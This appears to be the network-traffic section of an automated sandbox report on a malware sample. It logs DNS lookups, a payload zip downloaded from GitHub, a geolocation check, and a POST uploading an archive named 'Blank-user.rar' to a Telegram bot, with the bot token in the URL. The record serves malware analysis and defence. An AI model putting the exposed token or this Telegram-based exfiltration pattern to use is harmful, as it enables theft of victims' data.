                                                  Jun 21, 2024 04:27:46.326965094 CEST6452153192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:46.333619118 CEST53645211.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jun 21, 2024 04:27:20.057917118 CEST192.168.2.41.1.1.10x4edcStandard query (0)github.comA (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:21.211312056 CEST192.168.2.41.1.1.10x2c4aStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:38.751970053 CEST192.168.2.41.1.1.10xca48Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:39.529364109 CEST192.168.2.41.1.1.10x25c7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:42.822154999 CEST192.168.2.41.1.1.10xa724Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:43.667745113 CEST192.168.2.41.1.1.10x7b98Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  Jun 21, 2024 04:27:46.326965094 CEST192.168.2.41.1.1.10x4a6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jun 21, 2024 04:27:20.064992905 CEST1.1.1.1192.168.2.40x4edcNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:21.217933893 CEST1.1.1.1192.168.2.40x2c4aNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:21.217933893 CEST1.1.1.1192.168.2.40x2c4aNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:21.217933893 CEST1.1.1.1192.168.2.40x2c4aNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:21.217933893 CEST1.1.1.1192.168.2.40x2c4aNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:38.758703947 CEST1.1.1.1192.168.2.40xca48No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:39.536168098 CEST1.1.1.1192.168.2.40x25c7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:42.829255104 CEST1.1.1.1192.168.2.40xa724No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:42.829255104 CEST1.1.1.1192.168.2.40xa724No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:42.829255104 CEST1.1.1.1192.168.2.40xa724No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:42.829255104 CEST1.1.1.1192.168.2.40xa724No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:43.685514927 CEST1.1.1.1192.168.2.40x7b98Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  Jun 21, 2024 04:27:46.333619118 CEST1.1.1.1192.168.2.40x4a6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:46.333619118 CEST1.1.1.1192.168.2.40x4a6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:46.333619118 CEST1.1.1.1192.168.2.40x4a6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                  Jun 21, 2024 04:27:46.333619118 CEST1.1.1.1192.168.2.40x4a6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                  • github.com
                                                  • raw.githubusercontent.com
                                                  • api.telegram.org
                                                  • ip-api.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449746208.95.112.1803288C:\Users\user\AppData\Local\Temp\Built.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jun 21, 2024 04:27:38.768310070 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                  Host: ip-api.com
                                                  Accept-Encoding: identity
                                                  User-Agent: python-urllib3/2.2.1
                                                  Jun 21, 2024 04:27:39.353378057 CEST379INHTTP/1.1 200 OK
                                                  Date: Fri, 21 Jun 2024 02:27:38 GMT
                                                  Content-Type: application/json; charset=utf-8
                                                  Content-Length: 202
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449731140.82.121.3443744C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-06-21 02:27:20 UTC105OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                  Host: github.com
                                                  Connection: Keep-Alive
                                                  2024-06-21 02:27:21 UTC556INHTTP/1.1 302 Found
                                                  Server: GitHub.com
                                                  Date: Fri, 21 Jun 2024 02:27:21 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                  Access-Control-Allow-Origin:
                                                  Location: https://raw.githubusercontent.com/quivings/Solara/main/Files/Solara.Dir.zip
                                                  Cache-Control: no-cache
                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                  X-Frame-Options: deny
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 0
                                                  Referrer-Policy: no-referrer-when-downgrade
                                                  2024-06-21 02:27:21 UTC3022INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449732185.199.109.133443744C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-06-21 02:27:21 UTC116OUTGET /quivings/Solara/main/Files/Solara.Dir.zip HTTP/1.1
                                                  Host: raw.githubusercontent.com
                                                  Connection: Keep-Alive
                                                  2024-06-21 02:27:21 UTC892INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 13737409
                                                  Cache-Control: max-age=300
                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                  Content-Type: application/zip
                                                  ETag: "5c9ceead5c2efca8aa0dc181d55eba0f35ec337ebb40013a7a4970e7d449d856"
                                                  Strict-Transport-Security: max-age=31536000
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: deny
                                                  X-XSS-Protection: 1; mode=block
                                                  X-GitHub-Request-Id: 5DDB:8F3CA:3AAD71:42A755:6674D18D
                                                  Accept-Ranges: bytes
                                                  Date: Fri, 21 Jun 2024 02:27:21 GMT
                                                  Via: 1.1 varnish
                                                  X-Served-By: cache-nyc-kteb1890098-NYC
                                                  X-Cache: HIT
                                                  X-Cache-Hits: 0
                                                  X-Timer: S1718936842.748517,VS0,VE18
                                                  Vary: Authorization,Accept-Encoding,Origin
                                                  Access-Control-Allow-Origin: *
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  X-Fastly-Request-ID: 43c4552da8dd065763665d1d49308cd55758ede6
                                                  Expires: Fri, 21 Jun 2024 02:32:21 GMT
                                                  Source-Age: 0
                                                  2024-06-21 02:27:21 UTC1378INData Raw: 50 4b 03 04 14 00 00 00 08 00 58 52 b3 58 c3 34 fd 63 9a 2b 00 00 28 60 00 00 2c 00 00 00 53 6f 6c 61 72 61 2e 44 69 72 2f 61 70 69 2d 6d 73 2d 77 69 6e 2d 63 72 74 2d 63 6f 6e 76 65 72 74 2d 6c 31 2d 31 2d 30 2e 64 6c 6c ec 99 79 7c 4c d7 fb c7 cf 2c 49 64 91 84 10 44 c8 44 62 37 c9 9d 89 6c 25 64 97 10 49 24 91 54 a4 c6 64 66 92 0c 93 99 98 25 11 ad 8a d0 d4 4e 11 14 d5 10 5a 5a 4a d1 5a 43 69 bf ad 3d 96 16 55 4b 11 45 ed aa 76 f1 fb dc 3b fb d2 6f fb c7 ef f7 fa be 5e bf d7 f7 f2 be e7 9c e7 39 cf 39 cf 59 ee 73 ef 99 0c cd 9f 47 38 84 10 2e 78 fd 9a 90 ed 44 7f c5 92 bf bf 0e 00 cf 80 9d 9e 64 ab eb d1 c0 ed ac b4 a3 81 39 25 72 0d af 4c ad 2a 56 8b 4b 79 12 b1 52 a9 d2 f2 0a 65 3c b5 4e c9 93 2b 79 89 19 d9 bc 52 95 54 16 d2 b2 a5 5b b0 a1 8d bc e1
                                                  Data Ascii: PKXRX4c+(`,Solara.Dir/api-ms-win-crt-convert-l1-1-0.dlly|L,IdDDb7l%dI$Tdf%NZZJZCi=UKEv;o^99YsG8.xDd9%rL*VKyRe<N+yRT[
                                                  2024-06-21 02:27:21 UTC1378INData Raw: fa f6 ed 5a 37 b4 ad b0 6e 9b 29 32 77 ab da 06 01 9d 56 58 8b 2b f4 42 db da 4c db 1a ad 1a bb d8 6a 25 4d 22 7d ae c8 5e 59 64 52 5a 6f 53 93 c8 94 b3 b7 35 6c 56 7d be 54 3c de 41 0d bd 54 5f 50 d8 eb 15 66 a5 03 c7 15 66 cf 15 8e 8c cd d6 3a 07 ce eb cc de eb 1c ba af b3 f4 5f e7 a0 03 9d 45 07 8e 1c d0 59 7a e0 70 fc 06 a9 48 67 b7 7f 8d 12 63 c6 6a 45 cd 32 43 b6 c2 4e 59 61 52 39 b0 64 b6 83 ce 66 af e9 cb fa c4 da c6 b8 dd 74 36 fb 4d 5f d6 27 76 16 4c 1f 15 12 8d ed 96 33 89 f4 b9 22 7b 65 91 49 69 bd 6a 26 91 29 67 6f 6b 58 32 7d de 76 ca 2d a5 fa 82 c2 5e af 30 2b 1d 38 ae 30 7b ae 70 64 6c b6 2e 2d d4 d8 eb f5 42 73 fe 2f aa 98 2b e9 1c 4c 81 ce 3c 07 76 1b d7 52 6a 28 38 70 53 a7 b0 50 3b d4 5b 54 70 38 8b 3a d3 2c d2 1e db e8 0d 22 63 ce 76
                                                  Data Ascii: Z7n)2wVX+BLj%M"}^YdRZoS5lV}T<AT_Pff:_EYzpHgcjE2CNYaR9dft6M_'vL3"{eIij&)gokX2}v-^0+80{pdl.-Bs/+L<vRj(8pSP;[Tp8:,"cv
                                                  2024-06-21 02:27:21 UTC1378INData Raw: 3e be 76 e6 7a f6 3b 6d 92 5b e7 cf ad 79 59 fe e6 11 ee d1 cf 0b 6f 2f be cb 09 73 fa 7a c9 b0 ca 6d 93 bb 54 af 7b f3 c5 ea e1 ca dc 82 0f 02 ef 05 55 9e f0 d0 2c e1 b0 38 05 bd 97 b2 37 8c 4c 98 da 14 1d 95 b8 ff 7e e7 cd 5d 75 c1 1d 07 29 b7 9c 1f 3b e5 cb 4f ce 77 1d dc f3 fd d0 83 9f 7f a3 5d 74 ff e3 5d 93 f7 64 be ca f9 73 5c 5a e0 a1 fa 9d 3b ae 94 78 e5 75 18 e4 d6 5e 27 4a f2 ec 73 4b 7a ac a4 7b 7f 6e 6d cd fd f5 3b d9 db 5e 04 e7 fd 71 b1 eb 4d 5e c3 a6 de aa 2d 1f 35 2f 68 ea b0 51 93 7d 3c d4 eb 40 9c 2b 1b 7b 92 55 5f cd 92 60 46 44 94 0f e6 b2 53 57 ae 07 e5 e6 dc 02 1b d7 c9 c9 85 c3 a1 3a d1 42 4f ae 2f b7 cd c6 05 31 17 7f 8c 3a 18 e6 21 cc bc 9b c7 2a ff 59 31 bf c2 8d ca a1 d5 ad b8 43 a9 21 ab 53 a9 41 02 3e d5 9b 5e 10 77 9f 60 f3
                                                  Data Ascii: >vz;m[yYo/szmT{U,87L~]u);Ow]t]ds\Z;xu^'JsKz{nm;^qM^-5/hQ}<@+{U_`FDSW:BO/1:!*Y1C!SA>^w`
                                                  2024-06-21 02:27:21 UTC1378INData Raw: 1d f4 5e af d5 d5 fe 0b ae 2c 74 e9 f4 f0 4a fa d3 59 2b 0f dd f0 59 f3 41 fa 81 8e 27 e7 aa 6b 7b 8d 2b 5d e6 f7 d4 ff 7e f6 e9 e2 23 5d 5e 17 74 3a ba 6a 56 43 f7 cd 95 92 dc c4 55 c3 8e 3e bb 59 ff 66 ee 85 65 ec a4 c4 50 d1 a3 73 5f fc 58 2d 54 be 5c 5d eb d3 74 4b 7e 7d dd aa 3e 7b 0e f4 f6 f6 94 cd f9 f0 97 3f 57 3d 6f dd cd 55 16 b5 f0 c1 84 80 c1 bb 4e 5c ce bd 71 7c fc a2 f6 05 07 c3 7d 45 17 16 74 4a 9d c3 df b3 a1 6f a2 ff 5d ef b6 7e e4 ad 0b e1 23 03 8f 2d f9 c1 f5 ee 7b 9e b3 32 4a 3d 7d d2 63 de e9 99 b2 5c 7d e2 0f c5 a1 7d b7 cb ea f3 e6 e7 4d 5c 38 bb ae 63 0a 27 ff 49 63 7d b1 9b 76 4d c4 1d 7e 68 bb 03 bf a9 23 5b 3f 52 7d d9 bf b8 fa 59 d6 e6 d9 61 be b2 ce 9e 33 2e 78 5f 94 3e 52 1d 4b fe f1 54 bb 9b 95 df 71 b7 9e 7a d1 e7 52 c0 8c
                                                  Data Ascii: ^,tJY+YA'k{+]~#]^t:jVCU>YfePs_X-T\]tK~}>{?W=oUN\q|}EtJo]~#-{2J=}c\}}M\8c'Ic}vM~h#[?R}Ya3.x_>RKTqzR
                                                  2024-06-21 02:27:21 UTC1378INData Raw: 97 6d 9e 6d 8a 90 db 09 8d a0 6e e8 cb 3c d0 70 ce 6f 35 1e 8d b6 8a ab 36 e6 70 1d ab 34 7f 1d ce 47 5a af ec bc ed ce 59 cf 6b 53 ab a7 cf 97 94 f8 66 36 46 c3 1e be 52 9a e2 b5 80 27 a1 f5 50 da 89 5e 15 89 b0 f0 67 59 49 b2 27 4c 2e 17 7e aa 88 1e 32 99 8e 36 a2 34 20 f1 33 a3 7c e0 84 1c 68 4e f5 ca 16 45 40 6b 66 c6 e7 75 89 f0 d6 ba e2 94 f8 3f 65 a0 0c 98 88 d0 7c 95 70 e2 5e e0 49 2e 70 e2 5c 79 a0 07 61 b9 72 43 b2 d6 9b b6 d9 fd 9b 7c b0 df 5a d2 ec 12 38 e6 8d bc 7f 80 12 43 33 d4 de 24 d4 c5 e0 bf e5 b6 98 f7 87 79 7b 7b fc 73 6f b1 0a 02 62 82 00 f8 8f e2 b6 bf 30 b7 17 e6 c0 fc 94 75 e3 00 58 3f 12 12 88 be db c2 fb f4 37 b7 96 23 c9 86 78 cc 64 b5 3e 41 2f 48 94 2e f6 8c 14 68 6d dc d2 3c a0 2c 59 89 d8 e4 00 ed b1 39 7e 9d d8 a9 d0 ce 9e
                                                  Data Ascii: mmn<po56p4GZYkSf6FR'P^gYI'L.~264 3|hNE@kfu?e|p^I.p\yarC|Z8C3$y{{sob0uX?7#xd>A/H.hm<,Y9~
                                                  2024-06-21 02:27:21 UTC1378INData Raw: b4 70 38 a9 2c ff 78 f6 c3 6e 3a 39 8d f1 b0 0d be d4 eb 87 6c 81 be 1a 2f 88 da 98 b5 ff da 95 4b c2 0c ad ac 25 c6 95 37 47 14 a4 92 b5 dd 07 b2 7a 9b 0d 26 1d 9e 1b 35 f6 3c 07 1a b6 3b a6 35 36 0f d6 9b 6b bd 4c 67 a6 13 17 ae ed 3e 89 2f b4 78 30 53 5b 64 68 91 98 9b b1 bf 3c 50 84 99 a8 7a 48 74 b8 cf 22 fa b9 d7 45 15 ca 2c 24 ee 0d 00 89 93 b8 cf d9 77 b2 fe 37 69 45 36 27 09 e6 f1 be 30 2f dc 23 58 bc bc 2c 91 ee ee 10 23 31 d1 fa ba f4 17 7d d7 c1 c7 a2 12 33 11 cf 01 c4 70 0e 62 10 40 f4 ff d5 01 e0 06 38 3f 7c 95 f9 8c bc 83 9b 3d dc 03 a4 a9 ff 21 02 22 62 4a a2 82 f2 60 45 40 50 44 04 26 0f e6 07 78 3f 44 80 ed db 08 80 f4 5c cf 7a 58 c3 41 1a 56 9e 5e 98 ab e5 9d 5d ad 9d be 13 ed 70 f0 b1 c6 7c 46 25 00 36 5a f2 cf 5c 53 0c 2a 02 01 9b 7c
                                                  Data Ascii: p8,xn:9l/K%7Gz&5<;56kLg>/x0S[dh<PzHt"E,$w7iE6'0/#X,#1}3pb@8?|=!"bJ`E@PD&x?D\zXAV^]p|F%6Z\S*|
                                                  2024-06-21 02:27:21 UTC1378INData Raw: c8 4f 2c ed 3c 26 22 be 1f b8 13 e7 1e 77 fa bc 9a a5 09 b0 7f 68 d1 d8 51 3a da df 63 71 d0 e9 68 03 13 a9 c3 2d d0 00 da 0c 76 ff 8f b3 68 ec 25 61 22 fc 30 18 20 21 0e fd 86 d1 4d 6f 59 f8 d7 b0 61 9d 9c f2 d0 ac 5c 65 f5 62 87 4c 2f a2 fe 5b 46 f7 c5 46 f1 59 6a 12 fd a3 18 dd 2f cc fd bd 8c f5 03 c5 ca 33 93 a4 60 e3 58 56 ee 71 82 b3 37 09 62 ef 2c f0 6f 78 40 2f 06 b7 8f 28 21 77 db 06 ec 32 04 db d4 d5 55 66 9f f1 b5 1d 85 26 2e 11 69 89 bd 62 e1 5f b0 1e bc d9 72 27 be 6b d7 da c2 db f1 31 ec e9 a3 89 17 bc 17 76 ef 85 3e 54 bc c1 37 39 e2 0c 7f cb 7a fd e5 9b 9b 0f ea b5 b3 a6 77 93 93 46 9a b2 ec 73 dc e2 37 23 61 a2 9b 10 3d 17 87 8a b7 fc ad b3 f4 7a 7d 44 73 62 09 0f 33 07 9b 05 16 2d da 44 9c 8b a2 39 65 3b 7a d3 b1 28 02 b9 c7 8f 98 08 76
                                                  Data Ascii: O,<&"whQ:cqh-vh%a"0 !MoYa\ebL/[FFYj/3`XVq7b,ox@/(!w2Uf&.ib_r'k1v>T79zwFs7#a=z}Dsb3-D9e;z(v
                                                  2024-06-21 02:27:21 UTC1378INData Raw: 4f e1 f1 6b e7 83 4b ec fd 9f 95 06 4c cc 7a a1 4a 03 21 0a aa a1 58 9e 71 48 d5 23 53 38 a3 6a bc 87 08 34 0a c3 5c db c2 51 36 d9 db a9 c2 fc 31 c5 07 50 51 48 a1 1e 5f a7 50 f9 ca 0c 67 f2 ec de 70 f8 d8 0a 5d e4 84 46 72 2d e7 e4 ad 5c be 2b 32 8b a7 64 14 45 95 05 bd 03 96 65 3a 90 95 b4 83 3b 42 62 3d 57 b9 67 ec bc 34 12 b0 e3 92 ab df 46 74 39 30 bc 8d 3b 80 4e 33 1b d7 c0 75 6b 95 ac 7c 1e 5d 09 37 e3 99 5c 8d 9a ce f3 5e 46 9f 0c 81 16 cd 2d b8 20 e6 06 f2 9f 6d 36 f1 34 db 44 76 0b ee 66 21 a9 6e 03 48 aa f2 ef dc 28 d7 31 7d d7 be 75 a3 c4 60 ba 2e ef b9 51 7e 46 7d 91 d8 27 bf 77 a4 28 63 62 2b 8f 19 90 f9 de 91 f2 73 ee 5b f9 08 96 e2 c9 3b 1a fc 66 86 67 3e e5 34 fa c0 b0 96 52 61 5b 9e 3c 2f 85 c2 72 78 6b eb 19 d8 be 43 a5 ea 42 e9 77 0e
                                                  Data Ascii: OkKLzJ!XqH#S8j4\Q61PQH_Pgp]Fr-\+2dEe:;Bb=Wg4Ft90;N3uk|]7\^F- m64Dvf!nH(1}u`.Q~F}'w(cb+s[;fg>4Ra[</rxkCBw
                                                  2024-06-21 02:27:21 UTC1378INData Raw: af 38 2c e5 56 8c c9 77 f5 67 c9 55 26 96 26 9b 84 06 b7 66 ba 95 fb 9c b5 61 0d af 9e 5b e1 3f 83 46 49 db 64 69 c5 f3 86 18 b5 15 1f 47 c9 3f 4e f6 d5 60 78 1f 74 e3 5d f3 fa f9 37 de 01 0f df 3c 49 63 2d cd 9c 3f ee b6 e2 77 01 6c ad 79 c7 93 00 a1 5b 78 f4 45 e0 d9 4b 3c 7e 58 06 33 2c ae c6 8c 1c 46 44 e4 e8 a9 fe 73 12 ed 8f 04 af 87 8e ef d4 f2 29 db 24 70 72 b9 50 1a 92 52 b0 10 7b 46 29 fa 1b c4 9c 2a 8a 59 6e 3c 3b ad ac ff ea 4a 26 d5 c6 fc 4b 12 b5 82 52 66 8d 36 85 74 cb b5 a4 57 2c 9b 4e d4 a1 dc cb a2 1a c2 c3 b5 87 bd a0 d6 8f d4 76 0c 55 ec cd 1f ad 57 65 f9 c7 36 38 53 94 ad 64 30 6e 6e 74 d4 ec ff 0b 9e ff 03 50 4b 03 04 14 00 00 00 08 00 58 52 b3 58 bb 8d 36 a8 80 29 00 00 28 58 00 00 2f 00 00 00 53 6f 6c 61 72 61 2e 44 69 72 2f 61 70
                                                  Data Ascii: 8,VwgU&&fa[?FIdiG?N`xt]7<Ic-?wly[xEK<~X3,FDs)$prPR{F)*Yn<;J&KRf6tW,NvUWe68Sd0nntPKXRX6)(X/Solara.Dir/ap
                                                  2024-06-21 02:27:21 UTC1378INData Raw: 0c 0d 17 88 f7 27 cc 61 6d 9a 34 9d 9a b5 bc 19 88 b8 40 ff d9 0b 7c 22 8f 23 05 ce 26 4f e4 71 e4 90 00 22 65 ce c7 66 68 33 c9 59 9f 63 a4 e2 7e 99 bf a9 e9 9b 6f f6 18 26 ef 97 b9 9b 9a ba f9 66 8e 61 e2 c2 02 f1 64 7f 86 a2 89 fc c4 6b 16 97 53 14 5c 58 50 00 31 68 56 93 09 02 ed 3d cf 4c 30 52 71 11 bf 68 99 29 ca 54 02 37 4f 21 ed ab 11 73 35 cd 24 81 f6 9e ad 50 26 09 b8 88 f9 75 c6 2c f2 ac dc 6c d9 ce 2d 61 20 fc 46 bd b9 95 88 bf f1 dd 49 c9 47 cc ab 3b 18 a9 8c 99 79 98 63 50 1f d3 f9 f9 6b cd a9 32 0f 63 0c 2a 24 62 9e bd 3c 43 c3 45 cc b3 9f 66 68 33 c9 d9 13 c9 b8 a5 22 e6 ee a9 49 02 2e 82 44 08 0c 9e a5 03 a6 28 b4 44 10 3e 70 4e 11 9d 02 12 73 f6 e2 24 01 17 31 df 6e 64 20 32 a4 67 33 3b 6b 43 46 fc b2 23 a7 28 53 89 39 53 c3 b0 29 23 7e
                                                  Data Ascii: 'am4@|"#&Oq"efh3Yc~o&fadkS\XP1hV=L0Rqh)T7O!s5$P&u,l-a FIG;ycPk2c*$b<CEfh3"I.D(D>pNs$1nd 2g3;kCF#(S9S)#~


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449747149.154.167.2204433288C:\Users\user\AppData\Local\Temp\Built.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-06-21 02:27:40 UTC268OUTPOST /bot6463842780:AAFaYRMI8L5vU1x4kT-GXUhqbxhmWpQtN6k/sendDocument HTTP/1.1
                                                  Host: api.telegram.org
                                                  Accept-Encoding: identity
                                                  Content-Length: 529394
                                                  User-Agent: python-urllib3/2.2.1
                                                  Content-Type: multipart/form-data; boundary=78f436dcf974873115ff8923a50ab021
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 2d 2d 37 38 66 34 33 36 64 63 66 39 37 34 38 37 33 31 31 35 66 66 38 39 32 33 61 35 30 61 62 30 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 d6 58 98 3b 21 04 00 00 01 0f 81 b6 02 99 8d b7 b4 53 7c fd 46 10 46 6a 4a 3a 33 20 6d 1f d9 17 02 a5 8b b5 43 de e0 b1 da a7 c2 24 9c 14 a7 7c 5b af e4 0b 8e c7 57 ec d4 1f 1b 22 79 b8 95 31 38 c5 15 ec 8e 23 cb 90 a0 f4 af 30 74 20 b8 8e 49 7d 37 6a e1 f9 3c 54 89 78 ca 49
                                                  Data Ascii: --78f436dcf974873115ff8923a50ab021Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!X;!S|FFjJ:3 mC$|[W"y18#0t I}7j<TxI
                                                  2024-06-21 02:27:40 UTC16384OUTData Raw: 62 6c 41 0d ff 17 d7 34 ad 0f 60 d7 da 03 17 32 b7 fd 7e 22 a5 d5 5d 98 b4 01 2b ea b5 2f 2e ba 7a 60 67 fc cd e5 eb de 5d 68 3b 62 14 4b 19 ae d2 dc 6d 7c 9e 92 19 02 e4 23 f2 33 1c 36 a2 37 15 18 0d 00 d3 de 54 1c 93 b9 fe 2e d9 95 5e 7c 26 44 37 8f b4 76 c2 9c e0 82 a6 93 e8 e2 22 49 f0 f0 4d cf 5d 5a 89 a7 98 cb 67 6e d7 2b b3 59 67 cd f2 3b eb 6c 77 b8 bc e2 3a ee 3f c5 d9 27 31 c3 4e 5e 5a 85 71 85 5e 35 1f 9d f3 8d c4 41 b2 81 b9 e5 a7 aa 3d 45 c3 39 13 0f 47 17 ed 70 54 39 eb b7 b3 e8 e4 24 20 d9 75 d1 36 91 9d 14 05 1e 39 17 ad f7 cb 91 58 96 69 5b 77 38 69 d2 2b e3 c1 e9 a4 82 26 1b f2 0c fd 06 82 42 8b dc cc 91 4b 1a 43 fd cd af 91 67 19 0a 80 80 c6 84 a8 03 6f ed b5 22 74 30 2e aa c4 24 51 8b 04 66 5c c1 6f ee 36 30 ab 2a e9 cf a4 cc 15 58 9b
                                                  Data Ascii: blA4`2~"]+/.z`g]h;bKm|#367T.^|&D7v"IM]Zgn+Yg;lw:?'1N^Zq^5A=E9GpT9$ u69Xi[w8i+&BKCgo"t0.$Qf\o60*X
